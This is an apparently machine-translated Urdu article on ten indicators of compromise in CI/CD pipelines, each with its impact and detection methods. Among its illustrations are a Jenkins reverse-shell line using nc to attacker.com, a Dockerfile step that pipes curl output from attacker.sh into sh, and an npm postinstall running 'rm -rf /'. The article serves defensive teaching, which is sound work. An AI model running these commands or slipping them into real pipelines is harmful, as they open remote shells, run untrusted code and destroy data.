تعارف: سائبرسیکیوریٹی میں سمجھوتہ کے اشارے کیا ہیں؟
سمجھوتہ کے اشارے پہلے انتباہی علامات ہیں جو آپ کا سسٹم یا pipeline حملے کے تحت ہو سکتا ہے. آسان الفاظ میں، سمجھوتہ کے اشارے حملہ آوروں کے چھوڑے ہوئے نشانات ہیں، جیسے عجیب logins، فائل میں تبدیلیاں، یا پوشیدہ میلویئر۔ میں آئی او سی سائبر سیکیورٹی، وہ جرم کے مقام پر فنگر پرنٹس کی طرح کام کرتے ہیں، جو آپ کو واضح ثبوت دیتے ہیں کہ کچھ غلط ہے۔ لہذا، جب ڈویلپرز پوچھتے ہیں سمجھوتہ کے اشارے کیا ہیں؟جواب صرف سرورز یا فائر والز تک محدود نہیں ہے، اس میں جدید میں چھپے خطرات بھی شامل ہیں۔ CI/CD pipelines.
ان میں pipelines، حملہ آور کوڈ کے ساتھ چھیڑ چھاڑ کر سکتے ہیں، بدنیتی پر مبنی انحصار انجیکشن کر سکتے ہیں، یا بغیر نوٹس کیے تعمیراتی مراحل کو تبدیل کر سکتے ہیں۔ تاہم، زیادہ تر گائیڈز اب بھی صرف سرورز یا نیٹ ورکس پر فوکس کرتے ہیں۔ نتیجے کے طور پر، سافٹ ویئر سپلائی چین آسان ترین اہداف میں سے ایک بن گیا ہے۔
یہی وجہ ہے کہ میں سمجھوتے کے اشارے تلاش کرنا CI/CD pipelines ضروری ہے۔ سب سے بڑھ کر، یہ ٹیموں کو مالویئر کو روکنے، رازوں کی حفاظت، اور سافٹ ویئر کی ترسیل کے ہر قدم کو محفوظ بنانے میں مدد کرتا ہے۔
میں سمجھوتہ کے سرفہرست 10 اشارے CI/CD Pipelines
سمجھوتہ کے اشارے کی وضاحت کرتے وقت، زیادہ تر فہرستیں سرورز یا نیٹ ورک پر مرکوز ہوتی ہیں۔ پھر بھی اندر CI/CD pipelines، حملہ آور بہت مختلف فنگر پرنٹس چھوڑتے ہیں۔ فعال دفاع کے لیے ان سگنلز کو پہچاننا بہت ضروری ہے۔ ذیل میں 10 IOC سائبرسیکیوریٹی ریڈ فلیگ ہیں جو ہر ڈویلپر اور سیکیورٹی انجینئر کو دیکھنا چاہیے۔
1. مشکوک انحصاری تبدیلیاں
میں سمجھوتہ کے اہم اشارے میں سے ایک pipelines ایک اچانک، عجیب انحصار اپ ڈیٹ ہے۔ حملہ آور اکثر خطرناک پیکجوں کو شامل کرنے کے لیے پیکیج مینیجرز میں ٹرسٹ ڈویلپرز کی جگہ کا استعمال کرتے ہیں۔
مثال کے طور پر، npm میں a package.json اختلاف میں اچانک شامل ہوسکتا ہے:
اس طرح کی تبدیلیاں محفوظ نظر آسکتی ہیں لیکن ہر تعمیر میں ٹروجنائزڈ کوڈ لگا سکتی ہیں۔
کے اثرات: سمجھوتہ شدہ تعمیرات ماخذ پر میلویئر کو وراثت دیتے ہیں۔
کھوج: انحصار کے جائزے نافذ کریں، لاک فائل کے فرق کو ٹریک کریں، اور ہر وقت نئے پیکجوں کو اسکین کریں۔
2. عمارتوں میں مبہم کوڈ
میلویئر مصنفین جائزوں کو نظرانداز کرنے کے لیے ابہام پر انحصار کرتے ہیں۔ نتیجے کے طور پر، میں سمجھوتہ کا یہ اشارے CI/CD pipelines کو پکڑنا مشکل ترین میں سے ایک ہو سکتا ہے۔ درحقیقت، مبہم پے لوڈ اکثر بغیر اطلاع کے اوپن سورس لائبریریوں یا کنٹینر امیجز میں پھسل جاتے ہیں۔
مثال کے طور پر:
- ایک PyPI پیکیج استعمال کر رہا ہے۔
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - غیر ضروری UPX بائنریز سے بھری ایک ڈاکر تصویر۔
- جاوا اسکرپٹ سے بھرا ہوا ہے۔
\x41\x42اسناد چوری کرنے والوں کو چھپانے سے بچ جاتا ہے۔
کے اثرات: پوشیدہ کوڈ تعمیر یا رن ٹائم کے دوران خاموشی سے کام کرتا ہے، جو اسے IOC سائبر سیکیورٹی میں ایک اہم سگنل بناتا ہے۔
کھوج: یکجا SAST فلیگ انکوڈ یا پیکڈ کوڈ پر میلویئر اسکیننگ کے ساتھ۔ سب سے بڑھ کر، ابہام کو سرخ جھنڈے کی طرح سمجھیں جو مزید تحقیقات کا مستحق ہے۔
3. گٹ میں بے نقاب راز: ایک کلاسک IOC سائبرسیکیوریٹی رسک
CI/CD pipelines اکثر براہ راست ذخیروں سے راز کا وارث ہوتا ہے۔ تاہم، جب گٹ میں راز ظاہر ہوتے ہیں۔، وہ اس سوال کے واضح جوابات میں سے ایک بن جاتے ہیں "میں سمجھوتہ کے اشارے کیا ہیں۔ pipelineے؟" ایک بار جب اسناد گٹ میں پہنچ جاتی ہیں، حملہ آور ان کا غیر معینہ مدت تک استحصال کر سکتے ہیں۔
مثال کے طور پر:
- A
.envفائل پر مشتمل ہے۔AWS_SECRET_KEY=. - ٹوکن اندر دھکیلے۔
config.json. - ہٹانے کے بعد بھی گٹ کی تاریخ میں راز اب بھی نظر آتے ہیں۔
کے اثرات: بے نقاب چابیاں حملہ آوروں کو براہ راست رسائی فراہم کرتی ہیں۔ CI/CD pipelines، کلاؤڈ سسٹم، یا ڈیٹا بیس۔ لہذا یہ سمجھوتہ کے سب سے خطرناک اشارے میں سے ایک ہے۔
کھوج: استعمال pre-commit hooks اور خفیہ سکیننگ کے لیے CI ملازمتیں، اور لیک شدہ کیز کو فوری طور پر منسوخ کر دیں۔ مزید برآں، نمائش والی کھڑکیوں کو کم کرنے کے لیے خودکار تدارک کو نافذ کریں۔
4. چھیڑ چھاڑ Pipeline کنفیگریشنز: سمجھوتے کے پوشیدہ اشارے
Pipeline configs ہائی ویلیو اہداف ہیں کیونکہ ایک ترمیم اکثر پورے ورک فلو کو ہائی جیک کر دیتی ہے۔. اس کے نتیجے میں، چھیڑ چھاڑ pipeline فائلیں IOC سائبرسیکیوریٹی کا ایک بڑا خطرہ ہیں جس کا روایتی مانیٹرنگ ٹولز شاذ و نادر ہی پتہ لگاتے ہیں۔
مثال کے طور پر:
GitHub ایکشنز میں:
- GitLab میں: ایک بدنیتی پر مبنی کام شامل کیا گیا۔
.gitlab-ci.ymlجو حساس ڈیٹا کو پھینک دیتا ہے۔ - جینکنز میں:
sh "nc -e /bin/bash attacker.com 4444".
کے اثرات: یہ غیر منظور شدہ تبدیلیاں آپ کو بدل دیتی ہیں۔ pipeline حملہ آوروں کے لیے ایک مستقل بیک ڈور میں، جو واضح طور پر سمجھوتہ کے اشارے کے طور پر شمار ہوتا ہے۔
کھوج: دستخط شدہ کنفیگرز کو نافذ کریں، PR کی منظوری درکار ہوں، اور غیر متوقع ملازمتوں کے لیے نگرانی کریں۔ اس کے علاوہ، سیٹ guardrails جو خود بخود تبدیل شدہ ورک فلو کو روکتا ہے۔
5. مراعات یافتہ IaC غلطیاں
بنیادی ڈھانچے کی غلط کنفیگرڈ تعریفیں اکثر پوشیدہ پچھلے دروازے بناتی ہیں۔ نتیجے کے طور پر، میں مراعات یافتہ ڈیفالٹس IaC ایک کلاسک IOC سائبر سیکیورٹی رسک ہیں۔
مثال کے طور پر:
- ایک Kubernetes تعیناتی جو پوڈ فراہم کرتی ہے۔
privileged: true. - ہیلم چارٹس کے ساتھ خدمات کو بے نقاب کرتے ہیں۔
0.0.0.0:22.
کے اثرات: حملہ آور روٹ لیول تک رسائی حاصل کرتے ہیں یا داخلی خدمات کو عوامی طور پر بے نقاب کرتے ہیں۔ نتیجتاً، یہ مسائل حملے کی سطح کو نمایاں طور پر وسعت دیتے ہیں۔
کھوج: کا اطلاق کریں IaC انضمام سے پہلے کم از کم استحقاق نافذ کرنے کے لیے اسکین کرنا۔ مزید برآں، یقینی بنائیں کہ ہر کنفیگریشن کا ایک حصے کے طور پر جائزہ لیا گیا ہے۔ pipeline.
6. غیر معمولی تعمیراتی رویے
حملہ آور اکثر بدل جاتے ہیں۔ pipeline بدنیتی پر مبنی اعمال میں پھسل جانے کا رویہ۔ دوسرے الفاظ میں، غیر معمولی تعمیراتی سرگرمی اس بات کے واضح جوابات میں سے ایک ہے کہ سمجھوتہ کے اشارے کیا ہیں CI/CD pipelines.
مثال کے طور پر:
- عجیب ڈومینز پر آؤٹ باؤنڈ نیٹ ورک کی درخواستیں بناتا ہے۔
- ایک Node.js پروجیکٹ کے دوران اچانک PowerShell کو جنم دیتا ہے۔
npm install. - بڑی بائنریز ڈاؤن لوڈ کرنے والی ایک CI جاب جس کی وضاحت اسکرپٹس میں نہیں کی گئی ہے۔
کے اثرات: سمجھوتہ شدہ تعمیرات میلویئر ڈسٹری بیوشن پوائنٹس کے طور پر کام کر سکتی ہیں۔ سب سے بڑھ کر، وہ ہر تعیناتی میں بدنیتی پر مبنی پے لوڈ پھیلاتے ہیں۔
کھوج: غیر متوقع عمل یا کنکشن کے لیے بلڈ لاگز کی نگرانی کریں۔ مزید برآں، معمول سے باہر کے طرز عمل کو جھنڈا لگانے کے لیے بے ضابطگی کا پتہ لگانے کو ترتیب دیں۔
7. IOC سائبرسیکیوریٹی خطرات کے طور پر نقصان دہ پیکیج اسکرپٹس
پیکیج مینیجرز لائف سائیکل کو سپورٹ کرتے ہیں۔ hooks جس کا حملہ آور فائدہ اٹھاتے ہیں۔ لہذا، npm، PyPI، یا Dockerfiles میں بدنیتی پر مبنی اسکرپٹس سمجھوتہ کے مضبوط اشارے ہیں۔
مثال کے طور پر:
- npm:
postinstallسکرپٹ چل رہا ہےrm -rf /یا C2 کی طرف اشارہ کرنا۔ - PyPI:
setup.pyپوشیدہ ازگر کوڈ انسٹال کرنے پر عمل کرنا۔ - ڈاکر فائل:
RUN curl attacker.sh | sh.
کے اثرات: حملہ کسی بھی رن ٹائم ٹیسٹنگ سے پہلے انسٹالیشن کے دوران ہوتا ہے۔ نتیجتاً، ڈویلپرز کو اس وقت تک کبھی نوٹس نہیں ہو سکتا جب تک کہ بہت دیر نہ ہو جائے۔
کھوج: اسکرپٹس انسٹال کرنے کے لیے اسکین پیکج ظاہر ہوتا ہے۔ اس کے علاوہ، خطرناک کو محدود hooks in CI/CD نمائش کو کم کرنے کے لئے ملازمتیں.
8. رجسٹری پوائزننگ انڈیکیٹرز آف کمپرومائز
حملہ آور رجسٹریوں میں نمونے کی جگہ لے لیتے ہیں یا ان میں ترمیم کرتے ہیں، اور یہ واقعات درسی کتاب کی مثالیں ہیں کہ سپلائی چین میں سمجھوتہ کے اشارے کیا ہیں pipelines.
مثال کے طور پر:
- ایک ڈوکر امیج ٹیگ کو خاموشی سے ٹروجنائزڈ پرت کے ساتھ اپ ڈیٹ کیا گیا۔
- ایک اندرونی پیکج کو زہریلے ورژن سے بدل دیا گیا۔
- npm نام کی جگہ squatting، جیسے
lodash-proxy.
کے اثرات: رجسٹری آرٹفیکٹ کا استعمال کرتے ہوئے ہر تعمیر سے سمجھوتہ ہو جاتا ہے۔ نہ صرف یہ، لیکن سمجھوتہ ڈاؤن اسٹریم سروسز تک پھیلتا ہے۔
کھوج: تمام رجسٹری پلوں پر دستخط اور سالمیت کی جانچ کو نافذ کریں۔ اس کے علاوہ، کے ساتھ artifact کی اصل کو ٹریک کریں SBOM توثیق
9. IOC ثبوت کے طور پر صارف کی غیر معمولی سرگرمی
سمجھوتہ شدہ اکاؤنٹس تقریباً ہمیشہ ہی غیر معمولی نشانات چھوڑ جاتے ہیں۔ اس کے مطابق، غیر معمولی ڈویلپر کا رویہ سمجھوتہ کا ایک مضبوط اشارہ ہے۔
مثال کے طور پر:
- Commits کو مقامی وقت کے مطابق صبح 3 بجے دھکیلا گیا۔
- چھٹیوں پر اکاؤنٹس کے ذریعے PR کی منظوری۔
- Pipelines غیر معمولی تعدد کے ساتھ متحرک ہوتا ہے۔
کے اثرات: حملہ آور بدنیتی پر مبنی تبدیلیاں داخل کرنے کے لیے چوری شدہ اسناد کا غلط استعمال کرتے ہیں۔ سب کے بعد، غیر مجاز commits عام ورک فلو میں آسانی سے مل جاتا ہے۔
کھوج: کی نگرانی SCM بے ضابطگیوں کے لیے سرگرمی، MFA نافذ کریں، اور ٹوکنز کو باقاعدگی سے گھمائیں۔ اس کے علاوہ، مشکوک پر الرٹ commit یا منظوری کے پیٹرن.
10. IOC سائبرسیکیوریٹی میں انٹیگریٹی یا دستخط کی جانچ میں ناکام
ایک عام لیکن نظر انداز سمجھوتہ کا اشارہ ایک ناکام سالمیت یا دستخطی چیک ہے۔ IOC سائبر سیکیورٹی میں، یہ چیک اس بات کی تصدیق کرتے ہیں کہ کوڈ یا نمونے مستند ہیں۔ ان کو چھوڑتے ہیں۔ pipelines بے نقاب.
مثالیں:
- ایک SHA256 ہیش متوقع چیکسم سے مماثل نہیں ہے۔
- ایک غائب یا غلط GPG دستخط۔
- An SBOM غیر دستخط شدہ نمونے دکھا رہے ہیں۔
کے اثرات: سالمیت کی ناکامیوں کا مطلب اکثر چھیڑ چھاڑ، رجسٹری پوائزننگ، یا میلویئر انجیکشن ہوتا ہے۔
کھوج: دستخطی چیک کو خودکار کریں، چیکسم کی توثیق کو نافذ کریں، اور غیر دستخط شدہ اجزاء کو بلاک کریں۔ سب سے بڑھ کر، ہر ناکام چیک کو سمجھوتہ کا واضح ثبوت سمجھیں۔
CI/CD ایک نظر میں سمجھوتہ کے اشارے
| سمجھوتہ کا اشارہ (IOC) | میں اثر CI/CD Pipelines | پتہ لگانے کا طریقہ |
|---|---|---|
| مشکوک انحصاری تبدیلیاں | حملہ آور پیکیج مینیجرز میں بدنیتی پر مبنی لائبریریوں کو انجیکشن دیتے ہیں، جس کی وجہ سے سمجھوتہ کیا جاتا ہے۔ | لاک فائل کے فرق کو ٹریک کریں، انحصار کے جائزوں کو نافذ کریں، اور انحصار کو مسلسل اسکین کریں۔ |
| عمارتوں میں مبہم کوڈ | پوشیدہ پے لوڈز بغیر کسی پتہ کے تعمیرات یا رن ٹائم کے دوران انجام دیتے ہیں۔ | استعمال SAST اور فلیگ بیس 64، ہیکس، یا پیکڈ کوڈ پیٹرن پر میلویئر اسکیننگ۔ |
| گٹ میں بے نقاب راز | لیک شدہ ٹوکنز یا API کیز حملہ آوروں کو اہم سسٹمز تک براہ راست رسائی فراہم کرتی ہیں۔ | گٹ میں خفیہ اسکین چلائیں۔ hooks اور لیک شدہ اسناد کو خود بخود منسوخ کر دیں۔ |
| چھیڑ چھاڑ Pipeline ترتیبات | ترمیم شدہ ورک فلو ڈیٹا کو باہر نکالنے یا اندر کو برقرار رکھنے کی اجازت دیتا ہے۔ CI/CD. | PR کی منظوری کی ضرورت ہے، دستخط شدہ کنفیگرز کو نافذ کریں، اور مانیٹر کریں۔ pipeline تبدیلیوں. |
| مراعات یافتہ طبقے IaC غلطیاں | حد سے زیادہ اجازت دینے والے کردار یا غیر محفوظ ڈیفالٹس بادل کے ماحول کو بے نقاب کرتے ہیں۔ | کم از کم استحقاق کے نفاذ کے لیے Terraform، Kubernetes، اور Helm فائلوں کو اسکین کریں۔ |
| غیر معمولی طرز عمل | Pipelines کو میلویئر ڈسٹری بیوشن پوائنٹس یا پس منظر کی نقل و حرکت کے لیے استعمال کیا جاتا ہے۔ | غیر متوقع ڈاؤن لوڈز، پروسیسز، یا آؤٹ باؤنڈ کالز کے لیے بلڈ لاگز کا تجزیہ کریں۔ |
| بدنیتی پر مبنی پیکیج اسکرپٹس | پوشیدہ پری/پوسٹ انسٹال اسکرپٹس رن ٹائم ٹیسٹنگ سے پہلے پے لوڈز کو متحرک کرتی ہیں۔ | پرخطر npm/PyPI اسکرپٹس کو مسدود کریں اور اس پر عملدرآمد کو محدود کریں۔ CI/CD ملازمتیں |
| رجسٹری پوائزننگ | ٹروجنائزڈ نمونے رجسٹریوں میں قابل اعتماد تصاویر یا بائنریز کی جگہ لے لیتے ہیں۔ | چیکسم کی تصدیق کریں، دستخط کی توثیق کو نافذ کریں، اور رجسٹریوں کو فعال طور پر اسکین کریں۔ |
| غیر معمولی صارف کی سرگرمی | سمجھوتہ شدہ اکاؤنٹس بدنیتی کو آگے بڑھاتے ہیں۔ commits یا ٹرگر pipelines. | ایم ایف اے کو نافذ کریں، مانیٹر کریں۔ commits بے ضابطگیوں کے لیے، اور تجزیہ کریں۔ login پیٹرن |
| ناکام سالمیت یا دستخطی چیک | چھیڑ چھاڑ والے کوڈ، انحصار، یا تصاویر میں داخل ہونے کی نشاندہی کرتا ہے۔ pipeline. | خودکار سالمیت کی جانچ پڑتال کریں اور غیر دستخط شدہ یا غیر مماثل اجزاء کو بلاک کریں۔ |
روایتی IOC سائبرسیکیوریٹی کیوں چھوٹ جاتی ہے۔ CI/CD خطرات
زیادہ تر تنظیمیں پہلے ہی سرورز، کمپیوٹرز یا نیٹ ورکس پر سمجھوتہ کرنے کے اشارے کی نگرانی کرتی ہیں۔ تاہم، IOC سائبرسیکیوریٹی کے لیے یہ کلاسک نقطہ نظر نظر انداز کرتا ہے۔ CI/CD pipelines، جو اب سب سے اہم حملے کی سطحوں میں سے ایک ہیں۔ درحقیقت، pipelines انوکھے سمجھوتے کے اشارے دکھاتے ہیں جن کا روایتی ٹولز پتہ نہیں لگا سکتے ہیں۔
روایتی سیکورٹی میں سمجھوتہ کے اشارے
روایتی IOC سائبر سیکیورٹی میں، توجہ عام طور پر ہوتی ہے:
- غیر معمولی logins یا IP پتے جو چوری شدہ اسناد کی تجویز کرتے ہیں۔
- مشکوک فائل ہیشز یا رجسٹری کی تبدیلیاں جو میلویئر کو ظاہر کرتی ہیں۔
- غیر متوقع آؤٹ باؤنڈ ٹریفک جو ڈیٹا کے اخراج کی طرف اشارہ کرتا ہے۔
یہ معروف اشارے ہیں جن میں بھی ٹریک کیا گیا ہے۔ MITER ATT&CK فریم ورک، جو عام مخالف رویوں اور حکمت عملیوں کا نقشہ بناتا ہے۔ یہ مفید اشارے ہیں۔ تاہم، وہ بنیادی طور پر آپریٹنگ سسٹمز یا کارپوریٹ نیٹ ورکس پر لاگو ہوتے ہیں۔ نتیجے کے طور پر، وہ ٹھیک ٹھیک چھیڑ چھاڑ سے محروم رہتے ہیں جو سافٹ ویئر سپلائی چین میں پہلے ہوتا ہے۔
کیوں CI/CD Pipelines مختلف ہیں۔
CI/CD pipelines خودکار ماحول ہیں جہاں ڈویلپرز commit کوڈ، پل انحصار، اور ریلیز بلڈز۔ حملہ آور جانتے ہیں کہ یہاں ایک سمجھوتہ ہر تعیناتی میں جھڑپ کرتا ہے۔ اس کے مطابق، میں سمجھوتہ کے اشارے کیا ہیں؟ CI/CD pipelines وہ بہت مختلف نظر آتے ہیں:
- ایک بدنیتی پر مبنی انحصار خاموشی سے package.json یا requirements.txt میں شامل کر دیا گیا۔
- API کیز یا ٹوکنز Git میں ظاہر ہیں۔ commits یا .env فائلیں۔
- مبہم کوڈ کو npm یا PyPI پیکجوں میں لگایا گیا ہے۔
- غیر محفوظ ڈیفالٹس کے ساتھ Terraform یا Kubernetes فائلیں جیسے مراعات یافتہ: سچ۔
- Pipeline ملازمتیں ڈیٹا کو نکالنے یا پچھلے دروازے کھولنے کے لیے ترمیم کی گئی ہیں۔
یہ سمجھوتے کا اشارہ ہے۔ CI/CD کے لیے پوشیدہ رہیں standard سیکورٹی کے اوزار.
آئی او سی سائبر سیکیورٹی میں فرق
اگرچہ بہت سی ٹیمیں سمجھوتے کے اشارے کی قدر کو سمجھتی ہیں، لیکن پھر بھی وہ صرف سرورز اور نیٹ ورک لاگ سے پتہ لگانے پر انحصار کرتی ہیں۔ لہٰذا، حملہ آور معمول کے نشانات چھوڑے بغیر ساختوں کو زہر دے سکتے ہیں یا میلویئر داخل کر سکتے ہیں۔ یہی وجہ ہے کہ XZ Utils بیک ڈور یا نقصان دہ npm پیکجز جیسے واقعات کا پروڈکشن تک پہنچنے تک پتہ نہیں چل سکا۔
سپلائی چین کے سمجھوتوں کی اس قسم کی طرف سے بھی روشنی ڈالی جاتی ہے۔ CISA کی سپلائی چین سیکیورٹی گائیڈنس، جو انتباہ کرتا ہے کہ حملہ آور تیزی سے نشانہ بنا رہے ہیں۔ CI/CD pipelines اور رجسٹریاں۔
لے آؤٹ
روایتی IOC سائبر سیکیورٹی ضروری ہے لیکن کافی نہیں۔ سب سے بڑھ کر، ٹیموں کو مخصوص سمجھوتہ کے اشارے کو پہچاننا چاہیے۔ CI/CD pipelines تب ہی وہ بدنیتی پر مبنی کوڈ کا پتہ لگاسکتے ہیں یا pipeline غلط استعمال اس سے پہلے کہ یہ ماحول میں پھیل جائے۔





